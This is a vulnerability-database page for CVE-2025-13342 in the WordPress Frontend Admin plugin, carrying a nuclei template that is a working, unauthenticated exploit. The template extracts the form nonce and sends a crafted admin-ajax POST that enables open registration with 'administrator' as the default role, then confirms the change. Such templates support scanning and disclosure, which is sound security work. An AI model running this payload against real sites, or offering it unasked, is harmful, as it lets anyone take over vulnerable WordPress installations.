Lucene search
+L

DynamiApps Frontend Admin <= 3.28.20 - Unauthenticated Arbitrary Options Update

🗓️ 04 Sep 2026 02:04:28Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Unauthenticated arbitrary options update in Frontend Admin <=3.28.20 enables site takeover or privilege escalation.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2025-13342
18 Apr 202609:49
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2025-13342
9 Dec 202510:28
githubexploit
circl
Circl
CVE-2025-13342
3 Dec 202514:26
circl
cnnvd
CNNVD
WordPress plugin Frontend Admin by DynamiApps 安全漏洞
3 Dec 202500:00
cnnvd
cve
CVE
CVE-2025-13342
3 Dec 202512:29
cve
cvelist
Cvelist
CVE-2025-13342 Frontend Admin by DynamiApps <= 3.28.20 - Unauthenticated Arbitrary Options Update
3 Dec 202512:29
cvelist
euvd
EUVD
EUVD-2025-200979
3 Dec 202512:29
euvd
kitploit
Kitploit
CVE-2025-13342
31 Aug 202613:13
kitploit
kitploit
Kitploit
CVE-2025-13342
2 Sep 202622:40
kitploit
nvd
NVD
CVE-2025-13342
3 Dec 202513:16
nvd
Rows per page
id: CVE-2025-13342

info:
  name: DynamiApps Frontend Admin <= 3.28.20 - Unauthenticated Arbitrary Options Update
  author: 0x_Akoko
  severity: critical
  description: |
    DynamiApps Frontend Admin plugin for WordPress <.= 3.28.20 contains a broken access control vulnerability caused by insufficient capability checks and input validation in ActionOptions::run() save handler, letting unauthenticated attackers modify critical WordPress options via crafted form data.
  impact: |
    Unauthenticated attackers can modify critical WordPress options, potentially leading to site takeover or privilege escalation.
  remediation: |
    Update to the latest version beyond 3.28.20.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/613f2035-3061-429b-b218-83805287e4f3
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13342
    - https://github.com/Altelus1/CVE-2025-13342
    - https://plugins.trac.wordpress.org/changeset/3400432/acf-frontend-form-element
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-13342
    epss-score: 0.02192
    epss-percentile: 0.81224
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 4
    vendor: dynamiapps
    product: frontend-admin
    framework: wordpress
    fofa-query: body="/wp-content/plugins/acf-frontend-form-element/"
    shodan-query: http.html:/wp-content/plugins/acf-frontend-form-element/
  tags: cve,cve2025,wordpress,wp,wp-plugin,bac,intrusive,vkev

flow: http(1) && http(2) && http(3) && http(4)

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"

    attack: clusterbomb
    payloads:
      paths:
        - /
        - /submit-post/
        - /edit-post/
        - /create-post/
        - /submit/
        - /register/
        - /registration/
        - /signup/
        - /my-account/
        - /account/
        - /submit-form/
        - /frontend-form/
        - /new-post/
        - /add-listing/
        - /add-post/

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "frontend-form", "_acf_nonce", "_acf_form")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: acf_nonce
        part: body
        group: 1
        regex:
          - 'name="_acf_nonce"[^>]*value="([a-f0-9]+)"'
          - 'value="([a-f0-9]+)"[^>]*name="_acf_nonce"'
        internal: true

      - type: regex
        name: acf_form
        part: body
        group: 1
        regex:
          - 'name="_acf_form"[^>]*value="([^"]+)"'
          - 'value="([^"]+)"[^>]*name="_acf_form"'
        internal: true

  - raw:
      - |
        GET /wp-login.php?action=register HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,*/*

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(tolower(body), "registration is not allowed", "registration is currently not allowed", "registration=disabled") || status_code == 302'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        _acf_nonce={{acf_nonce}}&_acf_form={{url_encode(acf_form)}}&action=frontend_admin%2Fform_submit&acff%5Badmin_options%5D%5Busers_can_register%5D=1&acff%5Badmin_options%5D%5Bdefault_role%5D=administrator

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "json")'
          - '!contains_any(body, "\"success\":false", "\"success\": false", "-1", "invalid_nonce", "nonce_failed")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-login.php?action=register HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,*/*

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "user_login", "user_email")'
          - '!contains_any(tolower(body), "registration is not allowed", "registration is currently not allowed")'
        condition: and
# digest: 4a0a00473045022100f8ae84f418757fc56fc3be4b3ce3394275ef5021b9d94f6bcd0fbce60ce45c8402204f0f64e05d459e6d2829bdc15c87308fa97747ba71ce7226f0bd3f36d34e3433:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Aug 2026 02:16Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.19.8
EPSS0.02192
SSVC
10